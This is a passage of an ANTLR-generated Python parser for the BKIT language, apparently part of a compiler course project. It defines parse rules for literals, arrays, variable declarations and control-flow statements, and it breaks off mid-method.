Primitive_dataContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def INT_LIT(self):\n return self.getToken(BKITParser.INT_LIT, 0)\n\n def FLOAT_LIT(self):\n return self.getToken(BKITParser.FLOAT_LIT, 0)\n\n def STRING_LIT(self):\n return self.getToken(BKITParser.STRING_LIT, 0)\n\n def BOOL_LIT(self):\n return self.getToken(BKITParser.BOOL_LIT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_data\n\n\n\n\n def primitive_data(self):\n\n localctx = BKITParser.Primitive_dataContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_primitive_data)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 122\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_dataContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_data\n\n\n\n\n def composite_data(self):\n\n localctx = BKITParser.Composite_dataContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_composite_data)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 124\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Array_litContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACE(self):\n return self.getToken(BKITParser.LEFT_BRACE, 0)\n\n def RIGHT_BRACE(self):\n return self.getToken(BKITParser.RIGHT_BRACE, 0)\n\n def primitive_data(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Primitive_dataContext)\n else:\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,i)\n\n\n def composite_data(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Composite_dataContext)\n else:\n return self.getTypedRuleContext(BKITParser.Composite_dataContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_array_lit\n\n\n\n\n def array_lit(self):\n\n localctx = BKITParser.Array_litContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_array_lit)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 126\n self.match(BKITParser.LEFT_BRACE)\n self.state = 129\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 127\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 128\n self.composite_data()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 138\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 131\n self.match(BKITParser.COMMA)\n self.state = 134\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 132\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 133\n self.composite_data()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 140\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 141\n self.match(BKITParser.RIGHT_BRACE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def var_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_list\n\n\n\n\n def var_list(self):\n\n localctx = BKITParser.Var_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_var_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 145\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,6,self._ctx)\n if la_ == 1:\n self.state = 143\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 144\n self.var_init()\n pass\n\n\n self.state = 154\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 147\n self.match(BKITParser.COMMA)\n self.state = 150\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,7,self._ctx)\n if la_ == 1:\n self.state = 148\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 149\n self.var_init()\n pass\n\n\n self.state = 156\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Scalar_varContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_scalar_var\n\n\n\n\n def scalar_var(self):\n\n localctx = BKITParser.Scalar_varContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_scalar_var)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 157\n self.match(BKITParser.ID)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_non_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_non_init\n\n\n\n\n def var_non_init(self):\n\n localctx = BKITParser.Var_non_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 18, self.RULE_var_non_init)\n try:\n self.state = 168\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,10,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 159\n self.match(BKITParser.ID)\n self.state = 163 \n self._errHandler.sync(self)\n _alt = 1\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt == 1:\n self.state = 160\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 161\n self.match(BKITParser.INT_LIT)\n self.state = 162\n self.match(BKITParser.RIGHT_BRACKET)\n\n else:\n raise NoViableAltException(self)\n self.state = 165 \n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,9,self._ctx)\n\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 167\n self.match(BKITParser.ID)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_varContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def composite_var(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Composite_varContext)\n else:\n return self.getTypedRuleContext(BKITParser.Composite_varContext,i)\n\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_var\n\n\n\n\n def composite_var(self):\n\n localctx = BKITParser.Composite_varContext(self, self._ctx, self.state)\n self.enterRule(localctx, 20, self.RULE_composite_var)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 170\n self.match(BKITParser.ID)\n self.state = 177 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 171\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 174\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID]:\n self.state = 172\n self.composite_var()\n pass\n elif token in [BKITParser.INT_LIT]:\n self.state = 173\n self.match(BKITParser.INT_LIT)\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 176\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 179 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def composite_var(self):\n return self.getTypedRuleContext(BKITParser.Composite_varContext,0)\n\n\n def scalar_var(self):\n return self.getTypedRuleContext(BKITParser.Scalar_varContext,0)\n\n\n def composite_data(self):\n return self.getTypedRuleContext(BKITParser.Composite_dataContext,0)\n\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_init\n\n\n\n\n def var_init(self):\n\n localctx = BKITParser.Var_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_var_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 183\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,13,self._ctx)\n if la_ == 1:\n self.state = 181\n self.composite_var()\n pass\n\n elif la_ == 2:\n self.state = 182\n self.scalar_var()\n pass\n\n\n self.state = 185\n self.match(BKITParser.ASSIGN)\n self.state = 188\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.LEFT_BRACE]:\n self.state = 186\n self.composite_data()\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 187\n self.primitive_data()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def composite_var(self):\n return self.getTypedRuleContext(BKITParser.Composite_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_init\n\n\n\n\n def composite_init(self):\n\n localctx = BKITParser.Composite_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 24, self.RULE_composite_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 190\n self.composite_var()\n self.state = 191\n self.match(BKITParser.ASSIGN)\n self.state = 192\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def scalar_var(self):\n return self.getTypedRuleContext(BKITParser.Scalar_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_init\n\n\n\n\n def primitive_init(self):\n\n localctx = BKITParser.Primitive_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 26, self.RULE_primitive_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 194\n self.scalar_var()\n self.state = 195\n self.match(BKITParser.ASSIGN)\n self.state = 196\n self.primitive_data()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Params_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_params_list\n\n\n\n\n def params_list(self):\n\n localctx = BKITParser.Params_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 28, self.RULE_params_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 198\n self.var_non_init()\n self.state = 203\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 199\n self.match(BKITParser.COMMA)\n self.state = 200\n self.var_non_init()\n self.state = 205\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Stmt_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt_list\n\n\n\n\n def stmt_list(self):\n\n localctx = BKITParser.Stmt_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 30, self.RULE_stmt_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 211\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 206\n self.var_declare_stmt()\n self.state = 207\n self.match(BKITParser.SEMI)\n self.state = 213\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 217\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,17,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n self.state = 214\n self.stmt() \n self.state = 219\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,17,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def if_stmt(self):\n return self.getTypedRuleContext(BKITParser.If_stmtContext,0)\n\n\n def for_stmt(self):\n return self.getTypedRuleContext(BKITParser.For_stmtContext,0)\n\n\n def while_stmt(self):\n return self.getTypedRuleContext(BKITParser.While_stmtContext,0)\n\n\n def dowhile_stmt(self):\n return self.getTypedRuleContext(BKITParser.Dowhile_stmtContext,0)\n\n\n def assign_stmt(self):\n return self.getTypedRuleContext(BKITParser.Assign_stmtContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def break_stmt(self):\n return self.getTypedRuleContext(BKITParser.Break_stmtContext,0)\n\n\n def continue_stmt(self):\n return self.getTypedRuleContext(BKITParser.Continue_stmtContext,0)\n\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def return_stmt(self):\n return self.getTypedRuleContext(BKITParser.Return_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt\n\n\n\n\n def stmt(self):\n\n localctx = BKITParser.StmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 32, self.RULE_stmt)\n try:\n self.state = 239\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,18,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 220\n self.if_stmt()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 221\n self.for_stmt()\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 222\n self.while_stmt()\n pass\n\n elif la_ == 4:\n self.enterOuterAlt(localctx, 4)\n self.state = 223\n self.dowhile_stmt()\n pass\n\n elif la_ == 5:\n self.enterOuterAlt(localctx, 5)\n self.state = 224\n self.assign_stmt()\n self.state = 225\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 6:\n self.enterOuterAlt(localctx, 6)\n self.state = 227\n self.break_stmt()\n self.state = 228\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 7:\n self.enterOuterAlt(localctx, 7)\n self.state = 230\n self.continue_stmt()\n self.state = 231\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 8:\n self.enterOuterAlt(localctx, 8)\n self.state = 233\n self.call_stmt()\n self.state = 234\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 9:\n self.enterOuterAlt(localctx, 9)\n self.state = 236\n self.return_stmt()\n self.state = 237\n self.match(BKITParser.SEMI)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class If_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def IF(self):\n return self.getToken(BKITParser.IF, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def THEN(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.THEN)\n else:\n return self.getToken(BKITParser.THEN, i)\n\n def stmt_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Stmt_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,i)\n\n\n def ENDIF(self):\n return self.getToken(BKITParser.ENDIF, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def ELSEIF(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.ELSEIF)\n else:\n return self.getToken(BKITParser.ELSEIF, i)\n\n def ELSE(self):\n return self.getToken(BKITParser.ELSE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_if_stmt\n\n\n\n\n def if_stmt(self):\n\n localctx = BKITParser.If_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 34, self.RULE_if_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 241\n self.match(BKITParser.IF)\n self.state = 242\n self.expr()\n self.state = 243\n self.match(BKITParser.THEN)\n self.state = 244\n self.stmt_list()\n self.state = 252\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.ELSEIF:\n self.state = 245\n self.match(BKITParser.ELSEIF)\n self.state = 246\n self.expr()\n self.state = 247\n self.match(BKITParser.THEN)\n self.state = 248\n self.stmt_list()\n self.state = 254\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 257\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.ELSE:\n self.state = 255\n self.match(BKITParser.ELSE)\n self.state = 256\n self.stmt_list()\n\n\n self.state = 259\n self.match(BKITParser.ENDIF)\n self.state = 260\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declare_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare(self):\n return self.getTypedRuleContext(BKITParser.Var_declareContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare_stmt\n\n\n\n\n def var_declare_stmt(self):\n\n localctx = BKITParser.Var_declare_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 36, self.RULE_var_declare_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 262\n self.var_declare()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class For_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FOR(self):\n return self.getToken(BKITParser.FOR, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def init_for(self):\n return self.getTypedRuleContext(BKITParser.Init_forContext,0)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def con_for(self):\n return self.getTypedRuleContext(BKITParser.Con_forContext,0)\n\n\n def update_for(self):\n return self.getTypedRuleContext(BKITParser.Update_forContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDFOR(self):\n return self.getToken(BKITParser.ENDFOR, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_for_stmt\n\n\n\n\n def for_stmt(self):\n\n localctx = BKITParser.For_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 38, self.RULE_for_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 264\n self.match(BKITParser.FOR)\n self.state = 265\n self.match(BKITParser.LEFT_PAREN)\n self.state = 266\n self.init_for()\n self.state = 267\n self.match(BKITParser.COMMA)\n self.state = 268\n self.con_for()\n self.state = 269\n self.match(BKITParser.COMMA)\n self.state = 270\n self.update_for()\n self.state = 271\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 272\n self.match(BKITParser.DO)\n self.state = 273\n self.stmt_list()\n self.state = 274\n self.match(BKITParser.ENDFOR)\n self.state = 275\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class While_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDWHILE(self):\n return self.getToken(BKITParser.ENDWHILE, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_while_stmt\n\n\n\n\n def while_stmt(self):\n\n localctx = BKITParser.While_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 40, self.RULE_while_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 277\n self.match(BKITParser.WHILE)\n self.state = 278\n self.expr()\n self.state = 279\n self.match(BKITParser.DO)\n self.state = 280\n self.stmt_list()\n self.state = 281\n self.match(BKITParser.ENDWHILE)\n self.state = 282\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Dowhile_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def ENDDO(self):\n return self.getToken(BKITParser.ENDDO, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_dowhile_stmt\n\n\n\n\n def dowhile_stmt(self):\n\n localctx = BKITParser.Dowhile_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 42, self.RULE_dowhile_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 284\n self.match(BKITParser.DO)\n self.state = 285\n self.stmt_list()\n self.state = 286\n self.match(BKITParser.WHILE)\n self.state = 287\n self.expr()\n self.state = 288\n self.match(BKITParser.ENDDO)\n self.state = 289\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Assign_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self):\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_assign_stmt\n\n\n\n\n def assign_stmt(self):\n\n localctx = BKITParser.Assign_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 44, self.RULE_assign_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 291\n self.var_non_init()\n self.state = 292\n self.match(BKITParser.ASSIGN)\n\n self.state = 293\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Break_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def BREAK(self):\n return self.getToken(BKITParser.BREAK, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_break_stmt\n\n\n\n\n def break_stmt(self):\n\n localctx = BKITParser.Break_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 46, self.RULE_break_stmt)\n try:\n self.enterOuterAlt(localctx, 